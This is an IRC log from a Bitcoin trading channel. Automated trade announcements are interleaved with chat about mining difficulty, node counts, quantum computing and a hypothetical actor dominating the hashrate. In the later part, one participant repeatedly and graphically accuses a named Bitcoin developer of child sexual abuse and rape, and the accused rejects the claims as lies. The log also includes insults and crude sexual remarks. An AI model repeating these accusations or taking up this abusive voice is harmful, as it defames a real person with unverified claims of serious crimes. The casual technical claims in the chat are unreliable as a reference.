[TAT.ASICMINER] 67 @ 0.02366 = 1.5852 BTC [-] Aug 24 21:50:08 [BTCTC] [TAT.ASICMINER] 7 @ 0.02365 = 0.1656 BTC [-] Aug 24 21:50:10 [BTCTC] [TAT.ASICMINER] 25 @ 0.02363 = 0.5908 BTC [-] Aug 24 21:50:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.0236 BTC [-] Aug 24 21:50:11 [BTCTC] [DMS.MINING] 35 @ 0.003621 = 0.1267 BTC [-] Aug 24 21:50:13 [BTCTC] [TAT.ASICMINER] 58 @ 0.0235 = 1.363 BTC [-] Aug 24 21:50:17 ahh ok well i thought they had it set to 10mins per block Aug 24 21:50:20 see.. thats my whole point, all the extra hash and the network is not getting faster Aug 24 21:50:29 it is set to 10, Aug 24 21:50:31 as far as transaction goes Aug 24 21:50:35 but it never reaches that Aug 24 21:50:41 cuz more hashing every day Aug 24 21:50:47 right Aug 24 21:50:51 [BTCTC] [DMS.MINING] 18 @ 0.00362 = 0.0652 BTC [-] Aug 24 21:51:18 eh, block just found! with a lot of waiting transactions Aug 24 21:51:23 bobbabad: thats because its all set... diff goes up to normalize block generation Aug 24 21:51:40 [BTCTC] [DMS.PURCHASE] 50 @ 0.01975 = 0.9875 BTC [+] Aug 24 21:51:40 [BTCTC] [LABCOIN] 10200 @ 0.003 = 30.6 BTC [+] Aug 24 21:51:41 [BTCTC] [DMS.PURCHASE] 20 @ 0.01975 = 0.395 BTC [+] Aug 24 21:51:47 if 75% of miners dropped off right now, the network would be sooo slow until next diff update Aug 24 21:51:56 I think the high variance is an issue, but I don't know what can be done about it Aug 24 21:51:57 ahh gotcha Aug 24 21:52:03 I think I get it Aug 24 21:52:04 because with high diff the remaining miners would take for ever to find blocks Aug 24 21:52:08 [BTCTC] [DMS.MINING] 47 @ 0.003612 = 0.1698 BTC [-] Aug 24 21:52:15 ystarnaud: yeah it happened with some alt coins Aug 24 21:52:23 so how often is it able to adjust difficulty Aug 24 21:52:38 i think every 2048 blocks? or 2 weeks or so Aug 24 21:52:43 2016 Aug 24 21:52:44 i forget the exact numbers Aug 24 21:52:49 ^ Aug 24 21:53:05 some alt coins do it sooner/quicker tho Aug 24 21:53:07 = 14 days Aug 24 21:54:21 hahah last block had 666 transactions :O Aug 24 21:55:18 .d Aug 24 21:55:19 65750060.14908 | Next Diff in 1978 blocks | Estimated Change: 26.4349% in 10d 2h 27m 51s Aug 24 21:56:02 bobbabad it is improving the network security. Aug 24 21:56:02 [BTCTC] [LABCOIN] 6500 @ 0.003 = 19.5 BTC [+] Aug 24 21:56:16 [BTCTC] [DMS.MINING] 40 @ 0.003612 = 0.1445 BTC [-] Aug 24 21:56:19 [BTCTC] [ASICMINER-PT] 1 @ 2.372 BTC [+] Aug 24 21:56:21 [BTCTC] [ASICMINER-PT] 1 @ 2.371 BTC [-] Aug 24 21:56:22 [BTCTC] [ASICMINER-PT] 3 @ 2.365 = 7.095 BTC [-] Aug 24 21:56:23 [BTCTC] [ASICMINER-PT] 1 @ 2.364 BTC [-] Aug 24 21:56:24 [BTCTC] [ASICMINER-PT] 1 @ 2.363 BTC [-] Aug 24 21:56:26 [BTCTC] [ASICMINER-PT] 3 @ 2.363 = 7.089 BTC [-] Aug 24 21:56:46 [BTCTC] [LABCOIN] 216 @ 0.003 = 0.648 BTC [+] Aug 24 21:56:49 [BTCTC] [LABCOIN] 100 @ 0.003 = 0.3 BTC [+] Aug 24 21:56:49 [BTCTC] [LABCOIN] 100 @ 0.003 = 0.3 BTC [+] Aug 24 21:56:50 [BTCTC] [LABCOIN] 100 @ 0.003 = 0.3 BTC [+] Aug 24 21:56:52 ystarnaud not soo slow. 3x slower :) Aug 24 21:56:59 haha true Aug 24 21:57:05 i just used random numbers :P Aug 24 21:57:05 mircea_popescu, I get that, but it doesnt seem "perfect" that it takes 50min for a transaction to go through after a difficulty change Aug 24 21:57:09 [BTCTC] [DMS.MINING] 20 @ 0.003556 = 0.0711 BTC [-] Aug 24 21:57:11 [BTCTC] [DMS.MINING] 30 @ 0.003555 = 0.1067 BTC [-] Aug 24 21:57:12 [BTCTC] [DMS.MINING] 100 @ 0.00355 = 0.355 BTC [-] Aug 24 21:57:20 [BTCTC] [DMS.SELLING] 20 @ 0.0166 = 0.332 BTC [+] Aug 24 21:57:23 bobbabad bitcoin is not for consumer transactions. Aug 24 21:57:40 one hour settlement is still much better than the alternatives available in the fiat banking world. Aug 24 21:57:48 very true Aug 24 21:57:48 agreed Aug 24 21:57:53 more nodes make the network more robust.. i'm not sure how accurate this is, but currently there are only 838 nodes connected which doens't seem very much: https://blockchain.info/nodes-globe?series=onlineNow Aug 24 21:58:07 dexX7 those are the nodes connectyed to the blockchain info node. Aug 24 21:58:13 i know Aug 24 21:58:26 there's about 1.6-2k nodes irl, but yes it's very low and it's been constantly dropping and it's a problem Aug 24 21:58:27 but i assume that represents "many"? Aug 24 21:58:39 hmm k Aug 24 21:58:55 early on we had 100's of k's. Aug 24 21:58:59 I'm running a node and it's doing fine, not that many connections Aug 24 21:59:09 so I don't think there's such a need Aug 24 21:59:29 seeded terabytes of bootstrap.dat though Aug 24 22:01:44 so another question, if on averge blocks are being solved every 10mins, does that mean that diffiuclty will stay unchanged? i.e average every 5mins means it will double? Aug 24 22:02:00 yes Aug 24 22:02:14 I see Aug 24 22:02:24 mircea_popescu: 4-5k connectable nodes atm Aug 24 22:02:51 cya assbot Aug 24 22:02:51 Scrat how do you count them ? Aug 24 22:03:29 was on the r&d forums 2 weeks ago Aug 24 22:03:34 cant dig it up for you, working atm Aug 24 22:04:26 that would be dev forum Aug 24 22:05:53 http://nodes.bitcoin.st/ says 5k Aug 24 22:12:46 i guess im a little behind the times. Aug 24 22:13:01 mircea_popescu: you may know the answer to this Aug 24 22:13:10 why are brazillian chicks always hot? Aug 24 22:13:22 i have no idea Aug 24 22:13:26 but i plan to go there and find out. Aug 24 22:14:17 i expect there will be a full report on trilema on ipanema Aug 24 22:14:28 perhaps Aug 24 22:34:50 hi mircea_popescu: withdrawals pls Aug 24 22:37:03 question, from both an economical and overall perspective, what do you think would happen if then netash suddenly started increasing like 1000x within one diff period? Aug 24 22:39:06 and it repeated, essentially mining the rest of the coins much more quickly then predicted Aug 24 22:39:22 like quantum computers or such Aug 24 22:41:51 depends on the cause Aug 24 22:42:51 and if it's 1 entity with 99% of this sudden hashing power Aug 24 22:43:21 quantum computers won't automatically destroy normal encrpytion Aug 24 22:43:27 or be any faster Aug 24 22:43:42 the superpositions are hard as fuck to distinguish and are built for specific problems Aug 24 22:43:53 So all this "OMG QUANTUM COMPUTERS" shit needs to stop. Aug 24 22:45:11 it can't get 1000x up due to orphans (unless it's 51% attack and then we have much bigger prob) Aug 24 22:45:25 my example would be one party Aug 24 22:45:59 and not one that intends to manipulate the system with its power Aug 24 22:46:12 (however impossible that may be to assert...) Aug 24 22:46:29 lol, a quantum computer is not a really really fast puter Aug 24 22:46:41 QC was an example Aug 24 22:46:45 it's not myquestion Aug 24 22:46:53 it gives you all the possible answers in the universe at once Aug 24 22:47:04 call them biosuper chips if it helps Aug 24 22:47:07 the problem is findish the answer you need Aug 24 22:47:15 finding* Aug 24 22:47:35 my question is mostly on two levels Aug 24 22:47:44 economic Aug 24 22:47:49 and sentiment Aug 24 22:47:55 which are obv connected Aug 24 22:48:01 sry.. just wanted to chime in on the qc question :p Aug 24 22:48:06 the how, is not the point here Aug 24 22:48:15 many nodes would drop from the network unable to verify the blocks Aug 24 22:48:42 and then, diff skyrocketing and reward suddenly dropping to zero would cause most miners to drop Aug 24 22:49:16 so this person would essentially destroy bitcoin Aug 24 22:49:28 yes, panic Aug 24 22:49:42 well then there's a flaw in the protocol Aug 24 22:49:47 and it should be destroyed Aug 24 22:50:22 right.. then bitcoin 2.0 beta.. Aug 24 22:50:34 so you are saying there are two boundaries essentially, Aug 24 22:50:53 1. not having more than about 50% of nethash in one party Aug 24 22:51:13 2. some amount of hash increase within one diff period is too much Aug 24 22:51:14 lol.. when qc will catch up with classical it will not be so abrupt Aug 24 22:51:21 what amount is too much at once? Aug 24 22:51:43 i'm using an extreme of course Aug 24 22:51:52 but your answer implies there is a line Aug 24 22:52:07 where too much hashing increase at once messes things up Aug 24 22:52:11 ThickAsThieves: hmmm when you start fresh node, it can process how many blocks/second? Aug 24 22:52:19 no idea Aug 24 22:52:37 ;;bc,stats Aug 24 22:52:40 Current Blocks: 254059 | Current Difficulty: 6.5750060149084814E7 | Next Difficulty At Block: 256031 | Next Difficulty In: 1972 blocks | Next Difficulty In About: 1 week, 3 days, 15 hours, 49 minutes, and 37 seconds | Next Difficulty Estimate: 86186779.85 | Estimated Percent Change: 31.08243 Aug 24 22:52:51 ;;calc 254000/3600 Aug 24 22:52:52 70.5555555556 Aug 24 22:52:58 ;;calc 254000/3600*600 Aug 24 22:52:58 42333.3333333 Aug 24 22:53:29 let's say 42000 blocks per second on ssd Aug 24 22:53:35 20:52 (B) 926 @ 0.00325000 LABCOIN Aug 24 22:53:45 mhmmm Aug 24 22:53:48 I got that over loopback, it may be 10x less over internet Aug 24 22:54:12 labcoin / actm at par? :p Aug 24 22:54:18 or even 100x Aug 24 22:54:27 so if someone were to increase the hashing tremendously, they might also need to supply a bunch of nodes? Aug 24 22:54:58 i guess point #1 comes first anyway Aug 24 22:54:59 no it may be just one node... but it will take time till rest of network will catch up Aug 24 22:55:10 you cant have a sudden increase without getting 51% Aug 24 22:55:53 but you say the miner is benevolent so we can dispense with that Aug 24 22:56:07 that cant be proven though Aug 24 22:56:11 it can only be claimed Aug 24 22:56:19 right? Aug 24 22:56:55 i dont imagine there is any one party we'd all trust Aug 24 22:57:09 if you examine which transactions he orphaned then something can be proven with some confidence Aug 24 22:57:30 if that was luke-jr, exclusion of sd would be clearly visible, for example Aug 24 22:57:35 :D Aug 24 22:57:38 hehe Aug 24 22:57:47 good joke jurov Aug 24 22:57:53 ThickAsThieves: there's also a 400% cap on diff increase iirc Aug 24 22:57:54 jurov is correct on that Aug 24 22:58:17 scrat, then that means someone could mine all the coins left in this scenario? Aug 24 22:58:22 what are we talking about anyway? Aug 24 22:58:37 a what if Aug 24 22:58:47 someone 99.99%ing bitcoin Aug 24 22:58:51 ThickAsThieves: yeah sure, but QC's can't hash faster anyway Aug 24 22:59:07 ThickAsThieves: yes, but not "all at once" Aug 24 22:59:16 if there is a 400 % cap Aug 24 22:59:29 aside from that i wasnt specifically meaning to point at Qcs Aug 24 22:59:34 QCs* Aug 24 22:59:37 why not? Aug 24 22:59:51 meh, I'd buy VPNs to make it look like 4 or 5 different miners at least, and just sell slowly :D Aug 24 23:00:21 because the time between blocks would still be at least 2.5 minutes Aug 24 23:00:24 Luke-Jr, that wouldnt change the fact that diff is going up 400% Aug 24 23:00:29 people would panic regardless Aug 24 23:00:54 diff is going up 400% anyway Aug 24 23:01:18 looks more like 30% to me Aug 24 23:01:34 give it a year, and count the previous adjustments :P Aug 24 23:01:49 oh, you mean 400% at once? Aug 24 23:01:49 and, again, my question was about how people would react, not whether or how Aug 24 23:01:54 yes Aug 24 23:01:58 ThickAsThieves: are you talking about a crypto breakthrough or china investing billions on asics? Aug 24 23:02:11 crypto breakthru Aug 24 23:02:15 Scrat: China? I'd worry more about USA at this point. Aug 24 23:02:31 north korea Aug 24 23:02:44 sweden Aug 24 23:02:44 USA is super evil Aug 24 23:02:49 Sweden is even more evil Aug 24 23:02:52 they have black metal Aug 24 23:02:54 stockholm syndrome Aug 24 23:02:55 sorry tat, i was wrong -- there wouldn't be a min block time, even with a diff cap Aug 24 23:02:56 say some mathy dude figured out some shit with some QC dude and made a quantum ASIC or such Aug 24 23:03:47 it isn't in his interest to recklessly flood network with blocks Aug 24 23:04:02 prolly ltc would see a rise in that case Aug 24 23:04:06 or some other alt Aug 24 23:04:10 or worse, someone is able to crack sha256 Aug 24 23:04:24 kakobrekla: lol, as if scrypt is QC-resistant Aug 24 23:04:36 ^ Aug 24 23:04:49 you'd need millions of qubits as opposed to hunderds, no? Aug 24 23:04:53 for scrypt Aug 24 23:04:59 furthermore, if people lose faith in btc they wont be keen to jump into some other coin Aug 24 23:05:09 ^ Aug 24 23:05:40 i did say or some other alt Aug 24 23:05:58 depends on how direction the hype'd go Aug 24 23:06:02 *which Aug 24 23:06:07 depends on WHY they lose faith Aug 24 23:06:12 cause of SHA or something else Aug 24 23:06:24 thestringpuller: sweden is death metal, norway is black metal Aug 24 23:06:31 for example luke becoming supreme leader Aug 24 23:06:36 btc is worth 0 next day Aug 24 23:06:55 pankkake: you must be swedish Aug 24 23:07:01 so it seems to me, the smart strategy would be to add the power to the network in a way and pace that did not cause panic, Aug 24 23:07:08 and rather than simply sell coins Aug 24 23:07:16 how many swedes are in here? Aug 24 23:07:18 manipulate all of bitcoin economy Aug 24 23:07:22 no I'm from the country who makes the best black metal: France Aug 24 23:07:36 on the long term it prolly does not matter if you add 400% worth over a week or ten Aug 24 23:07:37 what do they make, iron? Aug 24 23:07:45 lol Aug 24 23:08:07 anyway, wouldn't Bitcoin just switch to another PoW? Aug 24 23:08:14 pankkake: yes Aug 24 23:08:21 what's a PoW? Aug 24 23:08:26 proof of work Aug 24 23:08:27 proof-of-work Aug 24 23:08:28 proof of work, i.e. sha256 Aug 24 23:08:29 I was pm'ing TheSwede in swedish hoping to extract some inside information about labcoin but just got a generic english reply that he cant hand out any info that manipulates the stock Aug 24 23:08:30 and depends what the damage is Aug 24 23:08:47 so that's an interesting take, Aug 24 23:09:01 the all powerful devs might lead/control the panic Aug 24 23:09:19 people have to upgrade their clients Aug 24 23:09:25 so without a real panic it won't happen Aug 24 23:09:35 zomg nethash has increased way too much, change everything! Aug 24 23:09:36 ThickAsThieves: devs can't change POW Aug 24 23:09:52 i assume you meant you would implement a new PoW Aug 24 23:09:54 into btc Aug 24 23:10:06 or do you mean a btc 2.0? Aug 24 23:10:08 ThickAsThieves: change of BC POW means almost 100% adoption to succeed Aug 24 23:10:14 all in all, i doubt our mastermind will choose bitcoin. there are much more valuable assets behind more easily crackable encyption Aug 24 23:10:18 slightly ot, but http://bitcoinmagazine.com/6021/bitcoin-is-not-quantum-safe-and-how-we-can-fix/ is a good reading about the implications of qc on bitcoin Aug 24 23:10:39 jurov - not [yet] :) Aug 24 23:10:41 that's partly what sparked my question Aug 24 23:10:48 that QC article Aug 24 23:11:09 dont read that magazine Aug 24 23:11:13 unless sheep Aug 24 23:11:14 i was just more interested in the economic implications Aug 24 23:11:22 like if the coins doubled Aug 24 23:11:29 and all were mined Aug 24 23:11:36 like next week Aug 24 23:11:40 what would happen Aug 24 23:12:00 crash to 0 Aug 24 23:12:15 market would be diluted and devauled Aug 24 23:12:22 sigh Aug 24 23:12:30 Vitalik publishing stuff before I've reviewed it Aug 24 23:12:31 depends on whether the overlord would sell, and stay mining Aug 24 23:12:55 dexX7: it's true that Bitcoin wouldn't "just work" with unused addresses, but it's a problem that already has solutions after-the-fact Aug 24 23:13:00 he'd ask that you pay him to continue mining of course ;) Aug 24 23:13:36 Luke-Jr, what is your gripe with Vitalik's article? Aug 24 23:13:48 (i have no opinion on it) Aug 24 23:13:50 dexX7: should QC happen, everyone would have to stop using the network, and a hardfork would be necessary - the hardfork would then require you to publish a HASH of your signature in advance of the key+signature itself Aug 24 23:14:05 damn, 50 AM shares for 2BTC a piece... o.O https://bitcointalk.org/index.php?topic=280637.0 Aug 24 23:14:09 thus proving you knew the key before it was published Aug 24 23:14:14 (we'd probably add Lamport at the same time) Aug 24 23:14:30 bobbabad, it's an auction Aug 24 23:14:41 ah, not fixed price Aug 24 23:14:42 yes if he does it recklessly then everyone just upgrades Aug 24 23:15:43 dexX7: also, using an address more than once is ALREADY considered a violation of the protocol, though tolerated due to lack of usability otherwise Aug 24 23:16:09 dexX7: and people have ALREADY lost money because they reused addresses Aug 24 23:19:39 well i have bad news, I have a QC, and I'm gonna mine all the coins. Sorry! Aug 24 23:19:51 ThickAsThieves: QC doesn't break mining Aug 24 23:19:57 mine does Aug 24 23:20:09 no matter how big Aug 24 23:20:09 ThickAsThieves: don't forget to buy all IDIFFs again xD Aug 24 23:20:16 hehehe Aug 24 23:23:40 and don't forget to IPO that miner :D Aug 24 23:27:32 now, THAT would be a good idea Aug 24 23:27:33 of course, that comes first Aug 24 23:27:43 if you get a QC miner, definitely auction it :P Aug 24 23:27:50 in bulk Aug 24 23:28:05 because you won't get nearly as much mining.. :p Aug 24 23:37:11 dafuq is diz shitz http://bflfraud.com/chat-logs/ Aug 24 23:38:12 o yeah that Aug 24 23:39:06 and using same address more than once is not violation of anything because there is no spec Aug 24 23:39:50 its just code, comments and jesus. Aug 24 23:43:19 and assbot.. where is she? Aug 24 23:43:26 dunno wtf Aug 24 23:43:32 freenode having issues or what Aug 24 23:44:32 what is that bflfrade shit? Aug 24 23:44:56 [MPEX] [S.MPOE] 4200 @ 0.00082693 = 3.4731 BTC [+] Aug 24 23:44:57 [MPEX] [S.MPOE] 2371 @ 0.00082756 = 1.9621 BTC [+] Aug 24 23:44:58 [MPEX] [S.MPOE] 2279 @ 0.00082766 = 1.8862 BTC [+] Aug 24 23:45:03 [BTCTC] [ACTIVEMINING] 68 @ 0.005403 = 0.3674 BTC [+] Aug 24 23:45:04 [BTCTC] [ACTIVEMINING] 932 @ 0.005401 = 5.0337 BTC [-] Aug 24 23:45:05 [BTCTC] [ACTIVEMINING] 100 @ 0.00531 = 0.531 BTC [-] Aug 24 23:45:06 [BTCTC] [ACTIVEMINING] 2 @ 0.00531 = 0.0106 BTC [-] Aug 24 23:45:07 [BTCTC] [ACTIVEMINING] 500 @ 0.0053 = 2.65 BTC [-] Aug 24 23:45:09 [BTCTC] [ACTIVEMINING] 249 @ 0.0053 = 1.3197 BTC [-] Aug 24 23:45:10 [BTCTC] [ACTIVEMINING] 134 @ 0.00525 = 0.7035 BTC [-] Aug 24 23:45:21 [BTCTC] [LABCOIN] 150 @ 0.00327 = 0.4905 BTC [-] Aug 24 23:45:31 [BTCTC] [ACTIVEMINING] 260 @ 0.00525 = 1.365 BTC [-] Aug 24 23:45:46 [BTCTC] [LABCOIN] 165 @ 0.00327 = 0.5396 BTC [-] Aug 24 23:45:47 [BTCTC] [LABCOIN] 2000 @ 0.003274 = 6.548 BTC [+] Aug 24 23:45:48 [BTCTC] [LABCOIN] 11453 @ 0.003275 = 37.5086 BTC [+] Aug 24 23:46:07 [BTCTC] [ASICMINER-PT] 1 @ 2.581 BTC [-] Aug 24 23:46:29 [BTCTC] [LABCOIN] 10000 @ 0.003276 = 32.76 BTC [+] Aug 24 23:46:30 [BTCTC] [LABCOIN] 1 @ 0.003276 BTC [+] Aug 24 23:47:39 [BTCTC] [LABCOIN] 50 @ 0.00329 = 0.1645 BTC [+] Aug 24 23:47:40 [BTCTC] [LABCOIN] 200 @ 0.00333 = 0.666 BTC [+] Aug 24 23:47:42 [BTCTC] [LABCOIN] 208 @ 0.003332 = 0.6931 BTC [+] Aug 24 23:47:43 [BTCTC] [LABCOIN] 175 @ 0.003387 = 0.5927 BTC [+] Aug 24 23:47:44 [BTCTC] [LABCOIN] 2865 @ 0.003388 = 9.7066 BTC [+] Aug 24 23:48:55 [BTCTC] [ASICMINER-PT] 1 @ 2.58 BTC [-] Aug 24 23:48:59 ROCKET MAN!!!!! Aug 24 23:50:47 [BTCTC] [KENILWORTH] 10 @ 0.001596 = 0.016 BTC [-] Aug 24 23:52:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.0268 BTC [+] Aug 24 23:59:06 [BTCTC] [DMS.MINING] 2 @ 0.00359 = 0.0072 BTC [-] Aug 24 23:59:09 let's say the following is given: If you send a transaction spending all 100 BTC in address 13ign, with 10 BTC going to 1v1tal to pay for goods and 90 BTC change going back to your new address at 1mcqmmnx, the first node that you send the transaction to can replace the change address with whatever they want, recover the private key from your public key, and forge your signature. < which Aug 24 23:59:09 tx would be considered as valid? the original or altered with the wrong change address? Aug 25 00:00:07 [BTCTC] [LABCOIN] 585 @ 0.00339 = 1.9832 BTC [+] Aug 25 00:00:27 [BTCTC] [BASIC-MINING] 1 @ 0.2308 BTC [+] Aug 25 00:00:29 [BTCTC] [BASIC-MINING] 3 @ 0.2308 = 0.6924 BTC [+] Aug 25 00:00:30 [BTCTC] [BASIC-MINING] 2 @ 0.2302 = 0.4604 BTC [-] Aug 25 00:00:31 [BTCTC] [BASIC-MINING] 291 @ 0.23 = 66.93 BTC [-] Aug 25 00:00:33 [BTCTC] [BASIC-MINING] 2 @ 0.23 = 0.46 BTC [-] Aug 25 00:00:34 [BTCTC] [BASIC-MINING] 1 @ 0.2263 BTC [-] Aug 25 00:00:35 [BTCTC] [LABCOIN] 1272 @ 0.00339 = 4.3121 BTC [+] Aug 25 00:00:37 [BTCTC] [LABCOIN] 30 @ 0.003391 = 0.1017 BTC [+] Aug 25 00:00:38 [BTCTC] [LABCOIN] 2198 @ 0.003391 = 7.4534 BTC [+] Aug 25 00:02:09 [BTCTC] [HOSTED-MINING] 3 @ 0.28 = 0.84 BTC [+] Aug 25 00:02:45 > the first node that you send the transaction to can replace the change address with whatever they want, Aug 25 00:02:47 what? Aug 25 00:03:21 [MPEX] [S.MPOE] 6721 @ 0.00082766 = 5.5627 BTC [+] Aug 25 00:03:21 [MPEX] [S.MPOE] 1337 @ 0.00082775 = 1.1067 BTC [+] Aug 25 00:07:02 [BTCTC] [LABCOIN] 85 @ 0.003284 = 0.2791 BTC [-] Aug 25 00:07:03 [BTCTC] [LABCOIN] 20 @ 0.003283 = 0.0657 BTC [-] Aug 25 00:07:05 [BTCTC] [LABCOIN] 4 @ 0.003281 = 0.0131 BTC [-] Aug 25 00:08:50 the assumption is that the node can recover your private key and thus forge your signature to alter the transaction (i.e. by replacing to change address to steal the 90 btc change) Aug 25 00:09:44 but wouldn't the original and forged tx in this case compete? Aug 25 00:13:28 >I completely agree. it was fun to start, now this whole pre-order thing is exhausting. Aug 25 00:13:31 lol idiots Aug 25 00:13:37 [BTCTC] [DMS.SELLING] 50 @ 0.01652 = 0.826 BTC [+] Aug 25 00:13:44 only now this whole preorder thing is exhusting Aug 25 00:13:54 after a year + of anal rape Aug 25 00:14:46 Luke-Jr i dont think jesus will like you go down with the rapists Aug 25 00:15:28 they are amateurs because they tried to handle a global logistics operation all by themselves Aug 25 00:15:37 in addition to developing a miner Aug 25 00:15:47 that's just stupid Aug 25 00:16:19 there is a reason the companies specializing in worldwide logistics are big Aug 25 00:16:49 you can't do it from a basement with a few inexperienced young nerds Aug 25 00:17:09 oh they are experienced Aug 25 00:17:11 with scamming. Aug 25 00:17:19 no doubt about that. Aug 25 00:17:24 they should have made deals with DHL, UPS etc etc Aug 25 00:17:43 outsourced all sales and shipment Aug 25 00:18:00 they should have outsorced everything but their logo Aug 25 00:18:48 [HAVELOCK] [AM100] 10 @ 0.0252 = 0.252 BTC [-] Aug 25 00:18:51 [HAVELOCK] [AM100] 30 @ 0.0251 = 0.753 BTC [-] Aug 25 00:18:53 [HAVELOCK] [AM100] 1 @ 0.025 BTC [-] Aug 25 00:20:54 [BTCTC] [DMS.SELLING] 50 @ 0.01659 = 0.8295 BTC [+] Aug 25 00:22:04 [BTCTC] [BASIC-MINING] 3 @ 0.2291 = 0.6873 BTC [+] Aug 25 00:22:05 [BTCTC] [BASIC-MINING] 1 @ 0.2291 BTC [+] Aug 25 00:22:07 [BTCTC] [BASIC-MINING] 1 @ 0.2291 BTC [+] Aug 25 00:22:08 [BTCTC] [BASIC-MINING] 20 @ 0.229 = 4.58 BTC [-] Aug 25 00:22:08 [BTCTC] [BASIC-MINING] 1 @ 0.2263 BTC [-] Aug 25 00:22:09 [BTCTC] [BASIC-MINING] 2 @ 0.2263 = 0.4526 BTC [-] Aug 25 00:22:10 [BTCTC] [BASIC-MINING] 12 @ 0.2262 = 2.7144 BTC [-] Aug 25 00:22:12 [BTCTC] [BASIC-MINING] 14 @ 0.225 = 3.15 BTC [-] Aug 25 00:22:17 [BTCTC] [DMS.SELLING] 100 @ 0.01659 = 1.659 BTC [+] Aug 25 00:22:18 [BTCTC] [DMS.SELLING] 50 @ 0.0166 = 0.83 BTC [+] Aug 25 00:24:21 [HAVELOCK] [XBOND] 1 @ 0.0011689 BTC [+] Aug 25 00:26:14 [BTCTC] [TAT.VIRTUALMINE] 92 @ 0.000979 = 0.0901 BTC [-] Aug 25 00:26:59 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00098 BTC [+] Aug 25 00:27:01 [BTCTC] [TAT.VIRTUALMINE] 524 @ 0.000999 = 0.5235 BTC [+] Aug 25 00:27:41 [BTCTC] [TAT.VIRTUALMINE] 1000 @ 0.001 = 1 BTC [+] Aug 25 00:29:16 [BTCTC] [LABCOIN] 6 @ 0.003294 = 0.0198 BTC [+] Aug 25 00:34:23 kakobrekla: slander isn't nice Aug 25 00:36:51 kako doesnt think people should be nice to idiots Aug 25 00:38:14 ThickAsThieves: doesn't mean he needs to make up lies about people he hates but can't find a truthful reason to make others hate Aug 25 00:38:14 :\ Aug 25 00:38:17 c'mon Aug 25 00:38:24 no need for namecalling Aug 25 00:38:40 i dont even know whatthe topic is Aug 25 00:38:49 but i assume it has to do with your shilling for bfl Aug 25 00:38:55 and the like Aug 25 00:38:56 no lies Aug 25 00:39:06 ThickAsThieves: I don't "shill" BFL or anyone else Aug 25 00:39:09 you are a scumbag, you cant get around that. Aug 25 00:39:10 [BTCTC] [TAT.ASICMINER] 10 @ 0.02525 = 0.2525 BTC [-] Aug 25 00:39:19 [BTCTC] [LABCOIN] 79 @ 0.003292 = 0.2601 BTC [-] Aug 25 00:39:22 kakobrekla: that's why you have to make up stuff about me Aug 25 00:39:31 mkay Aug 25 00:39:33 [BTCTC] [BTC-BOND] 542 @ 0.009999 = 5.4195 BTC [+] Aug 25 00:39:34 clearly sexually abusing your kids is not enough reason Aug 25 00:39:39 Luke-Jr don't mind this is irc, some ppl are young and rude :p Aug 25 00:39:52 while most are just idiots Aug 25 00:39:54 gecko_x2: this is IRC, not AOL Aug 25 00:40:12 mmm AOL Aug 25 00:40:22 although this channel might as well be AOL Aug 25 00:40:36 [BTCTC] [LABCOIN] 52 @ 0.003299 = 0.1715 BTC [+] Aug 25 00:40:37 [BTCTC] [LABCOIN] 100 @ 0.003299 = 0.3299 BTC [+] Aug 25 00:40:38 but you are here too Aug 25 00:40:40 sometimes.. Aug 25 00:40:44 with all the trolls who think they can make up lies and they become true Aug 25 00:40:50 ThickAsThieves: barely Aug 25 00:41:11 so younever forced your wife to have sex in the same bed your 4 kids are sleeping? Aug 25 00:41:19 must be lies Aug 25 00:41:29 [BTCTC] [LABCOIN] 235 @ 0.0033 = 0.7755 BTC [+] Aug 25 00:41:37 o.0 Aug 25 00:41:42 [BTCTC] [ACTIVEMINING] 63 @ 0.005249 = 0.3307 BTC [-] Aug 25 00:41:44 [BTCTC] [ACTIVEMINING] 800 @ 0.005248 = 4.1984 BTC [-] Aug 25 00:41:45 [BTCTC] [ACTIVEMINING] 500 @ 0.005248 = 2.624 BTC [-] Aug 25 00:41:46 [BTCTC] [ACTIVEMINING] 270 @ 0.005247 = 1.4167 BTC [-] Aug 25 00:41:47 see what I mean Aug 25 00:41:49 welcom to the bitcoin dev team Aug 25 00:42:07 I dont have many regrets in life but selling my labcoin stock @ .0025 is one of them lol Aug 25 00:42:08 i'd like to concentrate on maing money instead of bickering :p Aug 25 00:42:09 rape and child abuse included Aug 25 00:42:13 making even Aug 25 00:42:23 dub are you lukes son or his wife in this scenario? Aug 25 00:42:23 [BTCTC] [LABCOIN] 7 @ 0.0033 = 0.0231 BTC [+] Aug 25 00:42:32 i'm confused Aug 25 00:42:45 note how he can't deny this Aug 25 00:42:47 labcoin to da moon :P Aug 25 00:42:49 [BTCTC] [LABCOIN] 2590 @ 0.0033 = 8.547 BTC [+] Aug 25 00:42:50 hehe Aug 25 00:42:55 because his ethics prevent telling lies Aug 25 00:42:56 ThickAsThieves: hahaha nice one Aug 25 00:43:00 ok this conv is way gone Aug 25 00:43:02 but not rape and kiddy fidling Aug 25 00:43:10 [BTCTC] [BASIC-MINING] 1 @ 0.227 BTC [+] Aug 25 00:43:49 [BTCTC] [BTC-BOND] 790 @ 0.01 = 7.9 BTC [+] Aug 25 00:43:52 I don't *have* to deny that. Anyone with a clue knows it's obviously lies. Aug 25 00:43:55 im just telling the truth Aug 25 00:43:58 apparently you cant tell someone to "eat a real penis" in response to "play a real class" in dota 2 Aug 25 00:44:09 he can conveniently avoid denying it by claiming trolling Aug 25 00:44:15 i'm in punishment mode Aug 25 00:44:31 because it sounds too far fetched to be true granted Aug 25 00:45:36 [BTCTC] [LABCOIN] 2168 @ 0.0033 = 7.1544 BTC [+] Aug 25 00:45:52 hehe Aug 25 00:46:21 and even though quite a number of people have seen him bragging about it, they dont want to be labled trolls by his little cabal of child rape apologists Aug 25 00:46:22 ThickAsThieves this convo is not gone Aug 25 00:46:31 you and all the rest of the pussies are gone Aug 25 00:46:42 ^ Aug 25 00:47:01 its quite scary to think that this is right there in the core dev team Aug 25 00:47:14 dub Gavin denies it, i heard. Aug 25 00:47:19 [BTCTC] [BASIC-MINING] 3 @ 0.23 = 0.69 BTC [+] Aug 25 00:47:21 [BTCTC] [BASIC-MINING] 14 @ 0.227 = 3.178 BTC [-] Aug 25 00:47:22 [BTCTC] [BASIC-MINING] 2 @ 0.226 = 0.452 BTC [-] Aug 25 00:47:23 [BTCTC] [BASIC-MINING] 6 @ 0.225 = 1.35 BTC [-] Aug 25 00:47:25 [BTCTC] [BASIC-MINING] 2 @ 0.225 = 0.45 BTC [-] Aug 25 00:47:26 [BTCTC] [BASIC-MINING] 2 @ 0.2172 = 0.4344 BTC [-] Aug 25 00:47:27 [BTCTC] 